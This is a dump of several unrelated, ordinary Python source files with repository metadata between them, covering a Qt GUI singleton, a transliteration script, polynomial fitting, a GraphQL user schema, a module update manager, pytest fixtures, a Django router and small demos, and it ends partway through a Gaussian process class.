from qtpy import QtGui as QG
from qtpy import QtWidgets as QW
from hydrus.core import HydrusConstants as HC
from hydrus.client.gui import ClientGUIMenus
class GUICore( QC.QObject ):
    """Process-wide singleton QObject that tracks whether a menu is open and
    pops up context menus (with a macOS modal-dialog workaround)."""

    my_instance = None

    def __init__( self ):
        QC.QObject.__init__( self )
        self._menu_open = False
        # Register this object as the singleton for instance() lookups.
        GUICore.my_instance = self

    @staticmethod
    def instance() -> 'GUICore':
        """Return the singleton, raising if it has not been constructed yet."""
        if GUICore.my_instance is None:
            raise Exception( 'GUICore is not yet initialised!' )
        else:
            return GUICore.my_instance

    def MenubarMenuIsOpen( self ):
        # Called when a menubar menu is opened.
        self._menu_open = True

    def MenubarMenuIsClosed( self ):
        # Called when a menubar menu is closed.
        self._menu_open = False

    def MenuIsOpen( self ):
        """Whether a tracked menu is currently open."""
        return self._menu_open

    def PopupMenu( self, window: QW.QWidget, menu: QW.QMenu ):
        """Show *menu* at the cursor position and destroy it afterwards."""
        if HC.PLATFORM_MACOS and window.window().isModal():
            # Ok, seems like Big Sur can't do menus at the moment lmao. it shows the menu but the mouse can't interact with it
            from hydrus.core import HydrusGlobals as HG
            if HG.client_controller.new_options.GetBoolean( 'do_macos_debug_dialog_menus' ):
                from hydrus.client.gui import ClientGUICoreMenuDebug
                ClientGUICoreMenuDebug.ShowMenuDialog( window, menu )
                ClientGUIMenus.DestroyMenu( menu )
                return
        if not menu.isEmpty():
            self._menu_open = True
            menu.exec_( QG.QCursor.pos() ) # This could also be window.mapToGlobal( QC.QPoint( 0, 0 ) ), but in practice, popping up at the current cursor position feels better.
            self._menu_open = False
        ClientGUIMenus.DestroyMenu( menu )


core = GUICore.instance  # module-level shorthand: call core() to fetch the singleton
|
[
"hydrus.admin@gmail.com"
] |
hydrus.admin@gmail.com
|
d7a93b3db19f615ebcdd0ac1d10a919df7fbe912
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03946/s474179666.py
|
715113807ff685cf063ff9f19abb2a900c2d1f50
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 609
|
py
|
# Reads n, t and a list a from stdin.  Scanning right-to-left, tracks the
# running maximum of the suffix a[index+1:] and the largest gap
# max_suffix - a[index] (i.e. the largest a[j] - a[i] with j > i),
# collecting every index that can serve as the low side (aa) or the high
# side (bb) of that best gap.  Prints the smaller of the two counts.
n,t=map(int,input().split())
a=list(map(int,input().split()))
diff_v=0        # best difference a[j]-a[i] (j>i) found so far
max_a_v=0       # maximum value over the suffix scanned so far
max_a_pos=[]    # positions attaining that maximum
aa=set([])      # candidate low-side indices achieving diff_v
bb=set([])      # candidate high-side indices achieving diff_v
for i in range(1,len(a)):
    index=len(a)-i-1
    # Update the running suffix maximum and its positions.
    if max_a_v<a[index+1]:
        max_a_v=a[index+1]
        max_a_pos=[index+1]
    elif max_a_v==a[index+1]:
        max_a_pos.append(index+1)
    # Compare the gap at this index against the best gap so far.
    if max_a_v-a[index]>diff_v:
        diff_v=max_a_v-a[index]
        aa=set([index])
        bb=set(max_a_pos)
    elif max_a_v-a[index]==diff_v:
        aa.add(index)
        bb|=set(max_a_pos)
    #print(a[index],max_a_v,diff_v,aa,bb)
# The answer is the smaller of the two candidate-set sizes.
print(min(len(list(aa)),len(list(bb))))
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
9fc53d2f86b48376293a5a058d7bc51c042f9954
|
432a8d6bc8ad5af9cb5585c2184b05f58e842285
|
/realestate/utils/lib.py
|
4d27c004e2ffb49fcfc1a66ea242da7599daace1
|
[] |
no_license
|
314casso/estate-agent
|
963e2a909ac9b190253d8ee40a69947cf19b1261
|
ccd07bd599dc51251523cf5e4ea6991b1d0d529d
|
refs/heads/master
| 2022-03-21T04:37:44.946548
| 2022-03-15T19:29:06
| 2022-03-15T19:29:06
| 4,037,752
| 7
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,169
|
py
|
# -*- coding: utf-8 -*-
from estatebase.models import LayoutFeature
# Cyrillic capital letters -> Latin transliterations.
_capital_letters = {
    u'А': u'A',
    u'Б': u'B',
    u'В': u'V',
    u'Г': u'G',
    u'Д': u'D',
    u'Е': u'E',
    u'Ё': u'E',
    u'Ж': u'Zh',
    u'З': u'Z',
    u'И': u'I',
    u'Й': u'Y',
    u'К': u'K',
    u'Л': u'L',
    u'М': u'M',
    u'Н': u'N',
    u'О': u'O',
    u'П': u'P',
    u'Р': u'R',
    u'С': u'S',
    u'Т': u'T',
    u'У': u'U',
    u'Ф': u'F',
    u'Х': u'H',
    u'Ц': u'Ts',
    u'Ч': u'Ch',
    u'Ш': u'Sh',
    u'Щ': u'Sch',
    u'Ъ': u'',
    u'Ы': u'Y',
    u'Ь': u'',
    u'Э': u'E',
    u'Ю': u'Yu',
    u'Я': u'Ya',
}

# Cyrillic lower-case letters -> Latin transliterations.
_lower_case_letters = {
    u'а': u'a',
    u'б': u'b',
    u'в': u'v',
    u'г': u'g',
    u'д': u'd',
    u'е': u'e',
    u'ё': u'e',
    u'ж': u'zh',
    u'з': u'z',
    u'и': u'i',
    u'й': u'y',
    u'к': u'k',
    u'л': u'l',
    u'м': u'm',
    u'н': u'n',
    u'о': u'o',
    u'п': u'p',
    u'р': u'r',
    u'с': u's',
    u'т': u't',
    u'у': u'u',
    u'ф': u'f',
    u'х': u'h',
    u'ц': u'ts',
    u'ч': u'ch',
    u'ш': u'sh',
    u'щ': u'sch',
    u'ъ': u'',
    u'ы': u'y',
    u'ь': u'',
    u'э': u'e',
    u'ю': u'yu',
    u'я': u'ya',
}


def transliterate(string):
    """Transliterate Cyrillic text into Latin characters.

    Lower-case letters map directly.  A capital letter has its whole
    replacement upper-cased when the following character is not a
    lower-case Cyrillic letter (or when it ends the string), so all-caps
    words keep multi-letter replacements like "CH" fully capitalised.
    Characters without a mapping (spaces, digits, Latin letters, and the
    soft/hard signs) are dropped from the output.
    """
    capital_letters = _capital_letters
    lower_case_letters = _lower_case_letters
    total = len(string)
    pieces = []
    for position, symbol in enumerate(string, 1):
        lower_repl = lower_case_letters.get(symbol)
        if lower_repl:
            pieces.append(lower_repl)
            continue
        upper_repl = capital_letters.get(symbol)
        if upper_repl:
            # Upper-case the whole replacement unless the next character
            # is a lower-case Cyrillic letter (i.e. a mixed-case word).
            if position >= total or string[position] not in lower_case_letters:
                upper_repl = upper_repl.upper()
            pieces.append(upper_repl)
    return u"".join(pieces)
# Print "TRANSLITERATED_NAME = pk" for every LayoutFeature, upper-cased —
# presumably for pasting as constant definitions (Python 2 print statement).
for st in LayoutFeature.objects.all().order_by('name'):
    result = '%s = %s' % (transliterate(st.name), st.pk)
    print result.upper()
# lst = list(WallConstrucion.objects.values_list('name', flat=True).order_by('id'))
# print ', '.join(lst)
|
[
"picasso75@yandex.ru"
] |
picasso75@yandex.ru
|
7f5db971fd478bb2ddf727c5947c78c2ad8f595f
|
ef50ddb13bc1e21e0feb7ccef228d7593a67924a
|
/vize/130401064.py
|
cbb6d848233adc660af1fb03870ab2d065225646
|
[
"Unlicense"
] |
permissive
|
nyucel/blm2010
|
8577ffda17312b41545ad4b9e2fef10b99bd3d8e
|
544df2b5c946fba1864c4c6c3a6e349d0f10d18e
|
refs/heads/master
| 2022-11-16T16:12:50.811339
| 2020-06-27T11:10:55
| 2020-06-27T11:10:55
| 259,298,537
| 3
| 155
|
Unlicense
| 2020-06-27T11:10:57
| 2020-04-27T11:49:35
|
Python
|
UTF-8
|
Python
| false
| false
| 2,622
|
py
|
# Süleyman Baltacı - 130401064
# -*- coding: utf-8 -*-
import numpy as np
def RMSE(pred, target):
    """Return the root-mean-square error between *pred* and *target*."""
    squared_errors = np.subtract(target, pred) ** 2
    return np.mean(squared_errors) ** 0.5
# Open the data file.
f = open("veriler.txt")
# Read the values; drop any blank lines.
data = f.readlines()
if "\n" in data: data.remove("\n")
# Store the values as a numpy array y; x is just the index 0..len(y)-1.
y = np.array(data, dtype=int)
x = np.array([i for i in range(len(y))], dtype=int)
# Open the results file.
f_sonuc = open("sonuclar.txt","w+")
f_sonuc.write("Tum veri uzerine tek bir polinom tanimlandiginda:\n\n")
## Case 1: a single polynomial fitted over the whole data set.
RMSE_list = [0]*6
for i in range(6):
    # poly: the fitted interpolation polynomial of degree i+1.
    poly = np.poly1d(np.polyfit(x, y, i+1))
    f_sonuc.write(f"Polinom derecesi: {i+1} \n")
    f_sonuc.write(f"Katsayilar: {poly.coeffs} \n")
    # Compute and record the RMSE for this degree.
    RMSE_list[i] = RMSE(poly(x), y)
    f_sonuc.write(f"RMSE: {RMSE_list[i]:.3f} \n\n")
# Find the degree with the lowest error and report it with its RMSE.
eniyi_derece = np.argmin(RMSE_list)+1
f_sonuc.write(f"En dusuk hatayi {eniyi_derece}. dereceden polinom vermektedir.\n")
f_sonuc.write(f"RMSE: {RMSE_list[eniyi_derece-1]:.3f} \n\n\n")
## Case 2: the data is split into blocks of ten and a polynomial is fitted to each.
f_sonuc.write("Her bir onluk icin farkli polinomlar bulundugunda:\n\n")
# Number of separate polynomials (ten-point blocks) needed:
onluk_sayisi = int((len(x)/10)) + 1
for i in range(onluk_sayisi):
    # Index range of this block; slice out its x and y data:
    i_min = i*10
    i_max = min(i*10+9, len(x)-1)
    x_curr = x[i_min:i_max+1:]
    y_curr = y[i_min:i_max+1:]
    # Lists holding the fitted polynomial of each degree and its RMSE.
    poly_lst =[]
    RMSE_list = []
    # If the block holds fewer than 7 points, try at most
    # (number of points in the block) - 1 polynomial degrees.
    for j in range(min(i_max-i_min, 6)):
        # Fit a polynomial of degree j+1 and compute its RMSE.
        poly_lst.append(np.poly1d(np.polyfit(x_curr, y_curr, j+1)))
        RMSE_list.append(RMSE(poly_lst[j](x_curr), y_curr))
    # Find the best-performing degree and write the result for this block.
    eniyi_derece = np.argmin(RMSE_list) + 1
    f_sonuc.write(f"x : [ {x[i_min]} {x[i_max]} ]\n")
    f_sonuc.write(f"Polinom derecesi: {eniyi_derece}, ")
    f_sonuc.write(f"RMSE: {RMSE_list[eniyi_derece-1]:.3f} \n\n")
f_sonuc.close()
f.close()
|
[
"necdetyucel@gmail.com"
] |
necdetyucel@gmail.com
|
628f41c51f58945e9f1e879863efe51d95e39ea8
|
cdf38bcd5f8a1f383a6c3b7d427382c3b83d4831
|
/users/schema.py
|
e49405ee50228175e5c6b66cdf5d7415c987d34b
|
[] |
no_license
|
profmcdan/real-estate-api
|
95725947f8893fbdf37156e2dc0055cd64e4f75e
|
44fe874151844139dc1f912128534565a6cfc029
|
refs/heads/master
| 2023-08-09T07:15:25.400049
| 2019-10-19T20:05:44
| 2019-10-19T20:05:44
| 216,026,644
| 0
| 0
| null | 2023-07-22T19:08:33
| 2019-10-18T13:09:48
|
Python
|
UTF-8
|
Python
| false
| false
| 1,247
|
py
|
from django.contrib.auth import get_user_model
import graphene
from graphene_django import DjangoObjectType
from graphql import GraphQLError
class UserType(DjangoObjectType):
    """GraphQL object type exposing the project's user model."""
    class Meta:
        model = get_user_model()
class CreateUser(graphene.Mutation):
    """Mutation that registers a new user account and returns it."""
    user = graphene.Field(UserType)

    class Arguments:
        email = graphene.String(required=True)
        password = graphene.String(required=True)
        firstname = graphene.String(required=True)
        lastname = graphene.String(required=True)

    def mutate(self, info, email, firstname, lastname, password):
        # Create the user through the model manager's create_user.
        user = get_user_model().objects.create_user(email=email, password=password,
                                                    firstname=firstname, lastname=lastname)
        return CreateUser(user=user)
class Mutation(graphene.ObjectType):
    """Root mutation type."""
    create_user = CreateUser.Field()
class Query(graphene.ObjectType):
    """Root query type: list all users, or fetch the authenticated user."""
    users = graphene.List(UserType)
    me = graphene.Field(UserType)

    def resolve_users(self, info):
        """Return every user."""
        return get_user_model().objects.all()

    def resolve_me(self, info):
        """Return the authenticated user, or raise GraphQLError.

        BUG FIX: the original read ``info.context.user or None`` and then
        dereferenced ``user.is_anonymous`` — an AttributeError whenever the
        context carried no user at all.  A missing user is now reported as
        the same authentication error instead of crashing.
        """
        user = info.context.user
        if user is None or user.is_anonymous:
            raise GraphQLError('Authentication required')
        return user
|
[
"danielale9291@gmail.com"
] |
danielale9291@gmail.com
|
bd0ff58733337b54a62c497740f531e4ad1eb6c9
|
e972e39c4580ce0099eb905c1922b501dce54901
|
/update/manager.py
|
425234f3f256bc175b8da462919582e9e8e6f79b
|
[
"Apache-2.0"
] |
permissive
|
y-du/module-update-service
|
cf8070e1fa842ea7767fb8315b2bb1bd377ff623
|
34de1474ab26cd8f590d93809ddf1376a62d8b49
|
refs/heads/master
| 2022-09-12T09:21:12.200249
| 2020-05-25T18:46:26
| 2020-05-25T18:46:26
| 266,853,076
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,985
|
py
|
"""
Copyright 2020 Yann Dumont
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__all__ = ("Manager", )
from .logger import getLogger
from .configuration import mu_conf, EnvVars
from .util import ModuleState, getDelay
import requests
import time
logger = getLogger(__name__.split(".", 1)[-1])
class Manager:
    """Polls the module registry and reinstalls local modules whose hash changed,
    carrying over user-set service-config values."""

    def __get(self, url):
        """GET *url* and return the decoded JSON body; raise RuntimeError on non-200."""
        response = requests.get(url=url)
        if not response.status_code == 200:
            raise RuntimeError(response.status_code)
        return response.json()

    def __getRemoteModules(self, url, mod_ids):
        """Fetch each module in *mod_ids* from the registry.

        Failures are logged and the module skipped, so a partial registry
        outage does not abort the whole update cycle.
        """
        modules = dict()
        for mod_id in mod_ids:
            try:
                modules[mod_id] = self.__get("{}/{}".format(url, mod_id))
            except Exception as ex:
                logger.error("can't retrieve module '{}' from registry - {}".format(mod_id, ex))
        return modules

    def __mergeConfigs(self, old: dict, new: dict):
        """Copy user-modified service-config values from *old* into *new* in place."""
        for key in old:
            for k, v in old[key]["service_configs"].items():
                # Keep the user's value when it differs from the fresh default.
                if k in new[key]["service_configs"] and not v == new[key]["service_configs"][k]:
                    logger.debug("found user value for '{}'".format(k))
                    new[key]["service_configs"][k] = v

    def run(self):
        """Main loop (never returns): every getDelay() seconds, diff local module
        hashes against the registry and update the modules that changed."""
        while True:
            time.sleep(getDelay())
            try:
                local_mods = self.__get("{}/{}".format(mu_conf.MM.url, mu_conf.MM.api))
                remote_mods = self.__getRemoteModules("{}/{}".format(mu_conf.MR.url, mu_conf.MR.api), local_mods.keys())
                # Collect modules present both locally and remotely whose hash differs.
                pending = list()
                for mod_id in set(local_mods) & set(remote_mods):
                    logger.info("checking '{}' ...".format(local_mods[mod_id]["name"]))
                    if not local_mods[mod_id]["hash"] == remote_mods[mod_id]["hash"]:
                        pending.append(mod_id)
                        logger.info("update pending for '{}' ...".format(local_mods[mod_id]["name"]))
                # Preserve user config values in the incoming definitions.
                for mod_id in pending:
                    logger.info("merging configs for '{}' ...".format(local_mods[mod_id]["name"]))
                    configs = self.__get("{}/{}/{}".format(mu_conf.CS.url, mu_conf.CS.api, mod_id))
                    self.__mergeConfigs(configs, remote_mods[mod_id]["services"])
                # Deactivate, wait until inactive, reinstall, reactivate.
                for mod_id in pending:
                    logger.info("updating '{}' ...".format(local_mods[mod_id]["name"]))
                    requests.patch(url="{}/{}/{}".format(mu_conf.MM.url, mu_conf.MM.api, mod_id), json={"state": ModuleState.inactive})
                    while True:
                        response = self.__get("{}/{}/{}".format(mu_conf.MM.url, mu_conf.MM.api, mod_id))
                        if response["state"] == ModuleState.inactive:
                            break
                        time.sleep(1)
                    remote_mods[mod_id]["id"] = mod_id
                    requests.post(url="{}/{}".format(mu_conf.MM.url, mu_conf.MM.api), json=remote_mods[mod_id])
                    requests.patch(url="{}/{}/{}".format(mu_conf.MM.url, mu_conf.MM.api, mod_id), json={"state": ModuleState.active})
                    logger.info("update for '{}' successful".format(local_mods[mod_id]["name"]))
            except Exception as ex:
                # BUG FIX: the original called
                # logger.exception("error during update:".format(ex)) — the
                # format string had no placeholder, so the exception was
                # silently dropped from the message.  (The enclosing no-op
                # try/finally: pass was removed as well.)
                logger.exception("error during update: %s", ex)
|
[
"42994541+y-du@users.noreply.github.com"
] |
42994541+y-du@users.noreply.github.com
|
f3cb3e73b19d480a327c9c4be7db3b599096e61e
|
9918208c80a3c396d8a1e13783d501d60dbc2050
|
/integration_tests/conftest.py
|
3fb8ef70a199bdfdb9c0ef602f656687b6fc764c
|
[] |
no_license
|
benjimin/digitalearthau
|
2d3010be76fad0d0b6b4854dbbad07e98254b239
|
5098bf3c88627cad78a8caa5ab703c586c17a6f7
|
refs/heads/develop
| 2022-02-27T07:36:16.009689
| 2017-09-14T05:51:27
| 2017-09-14T05:51:27
| 103,460,937
| 0
| 0
| null | 2017-09-13T23:10:15
| 2017-09-13T23:10:15
| null |
UTF-8
|
Python
| false
| false
| 3,552
|
py
|
import itertools
import logging
import os
from contextlib import contextmanager
from pathlib import Path
import pytest
import shutil
import yaml
import digitalearthau
from datacube.config import LocalConfig
from datacube.index._api import Index
from datacube.index.postgres import PostgresDb
from datacube.index.postgres import _dynamic
from datacube.index.postgres.tables import _core
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader
INTEGRATION_DEFAULT_CONFIG_PATH = Path(__file__).parent.joinpath('deaintegration.conf')
INTEGRATION_TEST_DATA = Path(__file__).parent / 'data'
PROJECT_ROOT = Path(__file__).parents[1]
DEA_MD_TYPES = digitalearthau.CONFIG_DIR / 'metadata-types.yaml'
DEA_PRODUCTS_DIR = digitalearthau.CONFIG_DIR / 'products'
def load_yaml_file(path):
    """Load every YAML document in *path* and return them as a list."""
    with path.open() as f:
        return list(yaml.load_all(f, Loader=SafeLoader))


@pytest.fixture
def integration_test_data(tmpdir):
    """Copy the bundled test data into the per-test temp dir; return its Path."""
    d = tmpdir.join('integration_data')
    shutil.copytree(str(INTEGRATION_TEST_DATA), str(d))
    return Path(str(d))


@pytest.fixture
def dea_index(index: Index):
    """
    An index initialised with DEA config (products)
    """
    # Add DEA metadata types, products. They'll be validated etc.
    for md_type_def in load_yaml_file(DEA_MD_TYPES):
        index.metadata_types.add(index.metadata_types.from_doc(md_type_def))
    for product_file in DEA_PRODUCTS_DIR.glob('*.yaml'):
        for product_def in load_yaml_file(product_file):
            index.products.add_document(product_def)
    return index


@pytest.fixture
def datasets(dea_index):
    """Placeholder fixture for test datasets / collection definitions."""
    # Add test datasets, collection definitions.
    pass


@pytest.fixture
def integration_config_paths():
    """Config file paths used for integration tests, in precedence order."""
    return (
        str(INTEGRATION_DEFAULT_CONFIG_PATH),
        os.path.expanduser('~/.datacube_integration.conf')
    )


@pytest.fixture
def global_integration_cli_args(integration_config_paths):
    """
    The first arguments to pass to a cli command for integration test configuration.
    """
    # List of a config files in order.
    return list(itertools.chain(*(('--config_file', f) for f in integration_config_paths)))


@pytest.fixture
def local_config(integration_config_paths):
    """LocalConfig assembled from the integration config files."""
    return LocalConfig.find(integration_config_paths)


@pytest.fixture()
def db(local_config):
    """Yield a database with a freshly recreated schema; close it afterwards."""
    db = PostgresDb.from_config(local_config, application_name='dea-test-run', validate_connection=False)
    # Drop and recreate tables so our tests have a clean db.
    with db.connect() as connection:
        _core.drop_db(connection._connection)
    remove_dynamic_indexes()
    # Disable informational messages since we're doing this on every test run.
    with _increase_logging(_core._LOG) as _:
        _core.ensure_db(db._engine)
    # We don't need informational create/drop messages for every config change.
    _dynamic._LOG.setLevel(logging.WARN)
    yield db
    db.close()


@contextmanager
def _increase_logging(log, level=logging.WARN):
    """Temporarily raise *log*'s level, restoring the previous level on exit."""
    previous_level = log.getEffectiveLevel()
    log.setLevel(level)
    yield
    log.setLevel(previous_level)


def remove_dynamic_indexes():
    """
    Clear any dynamically created indexes from the schema.
    """
    # Our normal indexes start with "ix_", dynamic indexes with "dix_"
    for table in _core.METADATA.tables.values():
        table.indexes.intersection_update([i for i in table.indexes if not i.name.startswith('dix_')])


@pytest.fixture
def index(db):
    """
    :type db: datacube.index.postgres._api.PostgresDb
    """
    return Index(db)
|
[
"jez@stulk.com"
] |
jez@stulk.com
|
3035b1f0f246ca1584d7f6b2f6e66ffe09a73ff8
|
07f34b776ac30e0e5e431730826eba0b324c5ad6
|
/fleet/deploy/template_manager.py
|
b8cfdc6736c8d9fdebaaed15d5a81f4add8297d2
|
[
"MIT"
] |
permissive
|
chrismcguire/fleet-py
|
bc54bd3293fcf5f921149ea412fe80ae8a9201bf
|
be8fdfc09e70110a8169add6a682e19d46ef6252
|
refs/heads/master
| 2021-01-17T09:24:16.390100
| 2015-08-13T22:55:16
| 2015-08-13T22:55:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 992
|
py
|
__author__ = 'sukrit'
from pkg_resources import resource_string
BUNDLED_TEMPLATE_PREFIX = "bundled://"
RAW_TEMPLATE_PREFIX = "raw://"


def fetch_template(template_url):
    """Resolve *template_url* to template text.

    bundled:// URLs load a packaged ``.service`` file via pkg_resources;
    raw:// URLs return the remainder of the URL verbatim.  http(s) URLs are
    not implemented yet and, like unrecognised or empty-payload URLs,
    yield None.
    """
    if template_url.startswith(('http://', 'https://')):
        pass  # remote fetching not implemented; falls through to None
    if template_url.startswith(BUNDLED_TEMPLATE_PREFIX):
        payload = template_url[len(BUNDLED_TEMPLATE_PREFIX):]
        if payload:
            template_file = payload + ".service"
            return resource_string(__name__, '../../templates/' + template_file)
    if template_url.startswith(RAW_TEMPLATE_PREFIX):
        payload = template_url[len(RAW_TEMPLATE_PREFIX):]
        if payload:
            return payload


def fetch_bundled_template_url(group='default', template_type='app'):
    """Build a bundled:// template URL such as ``bundled://default-app``."""
    return '{}{}-{}'.format(BUNDLED_TEMPLATE_PREFIX, group, template_type)
|
[
"sukrit007@gmail.com"
] |
sukrit007@gmail.com
|
b03a754744d2e92f98ee97643c8249fbd63105f3
|
20f951bd927e4e5cde8ef7781813fcf0d51cc3ea
|
/fossir/core/db/sqlalchemy/__init__.py
|
a5540829307aa4983312efca38ece0cfeda969e1
|
[] |
no_license
|
HodardCodeclub/SoftwareDevelopment
|
60a0fbab045cb1802925d4dd5012d5b030c272e0
|
6300f2fae830c0c2c73fe0afd9c684383bce63e5
|
refs/heads/master
| 2021-01-20T00:30:02.800383
| 2018-04-27T09:28:25
| 2018-04-27T09:28:25
| 101,277,325
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 771
|
py
|
# This file is part of fossir.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# fossir is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# fossir is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with fossir; if not, see <http://www.gnu.org/licenses/>.
from .core import db
from .custom import *
|
[
"hodardhazwinayo@gmail.com"
] |
hodardhazwinayo@gmail.com
|
ae21bc2c5a6ff8248e3231bbae691421738545f1
|
0cb970785a746a30f9b44b3e5234157818688197
|
/listsFolder/sort.py
|
16f655fb2a7ec882998f946257dc9b5209e1ce96
|
[] |
no_license
|
charan2108/pythonprojectsNew
|
4255bbb81b6cf0d47c51c131ed93a0bb331a669c
|
b2f273d44937ec576daa0235d0d0326ff5149bf8
|
refs/heads/main
| 2023-05-03T16:55:33.242693
| 2021-05-26T11:18:17
| 2021-05-26T11:18:17
| 371,001,254
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 196
|
py
|
# Demonstrates ordering a list: print it as entered, then in ascending
# order, then again as entered followed by descending order.
vehicles = ['ferrari', 'ford', 'benz', 'audi', 'lamb']
print(vehicles)
vehicles = sorted(vehicles)
print(vehicles)
# reverse
vehicles = ['ferrari', 'ford', 'benz', 'audi', 'lamb']
print(vehicles)
vehicles = sorted(vehicles, reverse=True)
print(vehicles)
|
[
"sumacharan.adabala@gmail.com"
] |
sumacharan.adabala@gmail.com
|
d134bb106b4a554dcd7baf533c2c404fd5273d94
|
cfc49e6e65ed37ddf297fc7dffacee8f905d6aa0
|
/modulo_counter.py
|
5717eeb441ff429c28ab838b66ead40db1c14c04
|
[] |
no_license
|
IfDougelseSa/cursoPython
|
c94cc1215643f272f935d5766e7a2b36025ddbe2
|
3f9ceb9701a514106d49b2144b7f2845416ed8ec
|
refs/heads/main
| 2023-06-12T16:51:29.413031
| 2021-07-07T00:20:53
| 2021-07-07T00:20:53
| 369,268,883
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,476
|
py
|
"""
Módulo Collections - Counter(Contador)
Collections -> High-performance Container datetypes
Counter -> Recebe um iterável como parâmetro e cria um objeto do tipo Collections Counter que é parecido
com um dicionário, contendo como chave o elemento da lista passado como parâmetro e como valor a quantidade
de ocorrẽncias desse elemento.
# Utilizando o counter
from collections import Counter
#Exemplo 1
#Podemos utilizar qualquer iterável, aqui usamos uma lista.
lista = [1, 1, 2, 2, 3, 3, 3, 1 ,1 ,1 ,2 ,2 ,4 ,4 ,4 , 5, 5, 3 , 55, 33, 66 , 55, 44, 33, 22, 2, 22, 33]
res = Counter(lista)
print(type(res))
print(res)
# Counter({1: 5, 2: 5, 3: 4, 4: 3, 33: 3, 5: 2, 55: 2, 22: 2, 66: 1, 44: 1})
# Veja que para cada elemento da lista, o Counter criou uma chave e colocou como valor a quantidade
# de ocorrências.
# Exemplo 2
print(Counter('Geek University'))
Counter({'e': 3, 'i': 2, 'G': 1, 'k': 1, ' ': 1, 'U': 1, 'n': 1, 'v': 1, 'r': 1, 's': 1, 't': 1, 'y': 1})
"""
from collections import Counter

# Example 3: count word occurrences in a text (split on whitespace).
texto = """ Lorem Ipsum is simply dummy text of the printing and typesetting industry.
Lorem Ipsum has been the industry's standard dummy text ever since the 1500s,
when an unknown printer took a galley of type and scrambled it to make a type specimen book"""
palavras = texto.split()
# print(palavras)
res = Counter(palavras)
print(res)
# Find the 5 most frequent words in the text.
print(res.most_common(5))
|
[
"doug_ccortez@outlook.com"
] |
doug_ccortez@outlook.com
|
1c4c018ec89c29b3fc8cded55da8088b460dfabd
|
923a14dd594191d77e30465027ece8371f28a7a6
|
/web-serpng/code/serpng/routers.py
|
40ae10220712dfe584223b7dc6fce22c9e272418
|
[] |
no_license
|
alyago/django-web
|
3af7b3389df59104eaf5e50ed9cc2c3e730fed7f
|
da3073eec6d676dfe0164502b80d2a1c75e89575
|
refs/heads/master
| 2021-01-10T19:33:45.425520
| 2013-11-21T09:43:37
| 2013-11-21T09:43:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
# Copyright (c) 2012, Simply Hired, Inc. All rights reserved.
"""Database Router"""
class SHRouter(object):
    """Database router sending autocomplete models to the 'autocomplete' alias."""

    def db_for_read(self, model, **hints):
        """Route reads of autocomplete.models.* to 'autocomplete'; None otherwise."""
        if model.__module__.startswith("autocomplete.models"):
            return 'autocomplete'
        else:
            # BUG FIX: the original had a bare ``None`` expression here (no
            # ``return`` keyword).  The function already fell through to an
            # implicit None, so behaviour is unchanged — the intent is just
            # explicit now.
            return None
class AllowSyncDBRouter(object):
    """Router deciding which models may be synced to which database."""

    def allow_syncdb(self, db, model):
        """Allow session models on 'default' and resume/south models on 'resume'."""
        module = model.__module__
        is_session_model = (db == 'default' and
                            module.startswith('django.contrib.sessions.models'))
        is_resume_model = (db == 'resume' and
                           (module.startswith("serpng.resume.models") or
                            module.startswith('south.')))
        return is_session_model or is_resume_model
|
[
"oleg@simplyhired.com"
] |
oleg@simplyhired.com
|
7e332c7f55f2003b9937427a4820c249e496d06f
|
306555b6f10ce4d64caca22c4a291a5ac6337e07
|
/Gaussian_Process.py
|
a9ae6361738bc3536a29d8302b8fce228b8be27e
|
[] |
no_license
|
BerenMillidge/GPs
|
1b107a265bb77452d2bb9a4a0854ae1b398ae6b7
|
3a8824c7c39a48d827ff098556bc23406cc7faad
|
refs/heads/master
| 2022-03-27T10:58:32.282459
| 2017-09-28T15:02:39
| 2017-09-28T15:02:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
from __future__ import division
import numpy as np
from kernels import*
# Module-level default kernel shared by GP instances that don't pass their own.
# NOTE(review): Kernel comes from `from kernels import *`; confirm the
# constructor signature ("name", [hyperparameters]) against kernels.py.
default_kernel = Kernel("exponential_kernel", [0.01])
class GP:
    """Minimal Gaussian-process wrapper around a data provider and a kernel."""
    def __init__(self, dataprovider, kernel = default_kernel):
        # dataprovider: source of training data (opaque here; used by callers).
        # kernel: object exposing calculate_kernel_value(x_i, x_j).
        self.dataprovider = dataprovider
        self.kernel = kernel
    def one_d_prior(self,data_vector):
        """Draw one sample from the GP prior evaluated at data_vector.

        Builds a zero-mean multivariate normal whose covariance is the kernel
        Gram matrix over the input points and returns a single draw from it.
        """
        N = len(data_vector)
        means = np.zeros(N)
        cov = np.zeros([N,N])
        # NOTE(review): xrange is Python 2 only — this module appears to
